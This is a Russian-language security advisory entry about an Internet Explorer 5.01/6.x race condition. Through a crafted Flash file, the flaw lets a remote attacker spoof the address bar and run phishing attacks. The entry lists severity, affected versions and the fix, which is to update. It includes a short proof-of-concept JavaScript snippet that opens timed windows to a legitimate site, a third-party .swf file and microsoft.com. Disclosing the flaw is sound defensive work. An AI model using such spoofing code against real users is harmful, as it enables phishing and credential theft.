Уязвимость состояния операции в Microsoft Internet Explorer

Дата публикации:
05.04.2006
Дата изменения:
08.04.2009
Всего просмотров:
3457
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Спуфинг атака
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 6.x
Уязвимые версии: Microsoft Internet Explorer 6.0

Описание:
Уязвимость позволяет удаленному пользователю подменить содержимое адресной строки браузера и произвести фишинг-атаку.

Уязвимость состояния операции обнаружена в Microsoft Internet Explorer при загрузке содержимого Web страницы и файлов формата Macromedia Flash (".swf") в окне браузера. Удаленный пользователь может подменить адресную строку браузера с помощью специально сформированного Flash файла. Пример:

	<a href="javascript:spoof()">Perform the second Test</a><br>
	<script>
	function makewin(url) {
		win = window.open (url, "new");
	}
	function spoof() {
		makewin('http://www.google.com/');
		setTimeout("makewin('http://one.fsphost.com/dangquang/musicflash1/bupbebietyeu.swf')",2000);
		setTimeout("makewin('http://www.microsoft.com/')",4000); 
	}
	</script> 

URL производителя: www.microsoft.com

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
08.04.2009
Изменена секция "Решение"

Ссылки: Another way to spoof Internet Explorer Address Bar
Another Internet Explorer Address Bar Spoofing Vulnerability

или введите имя

CAPTCHA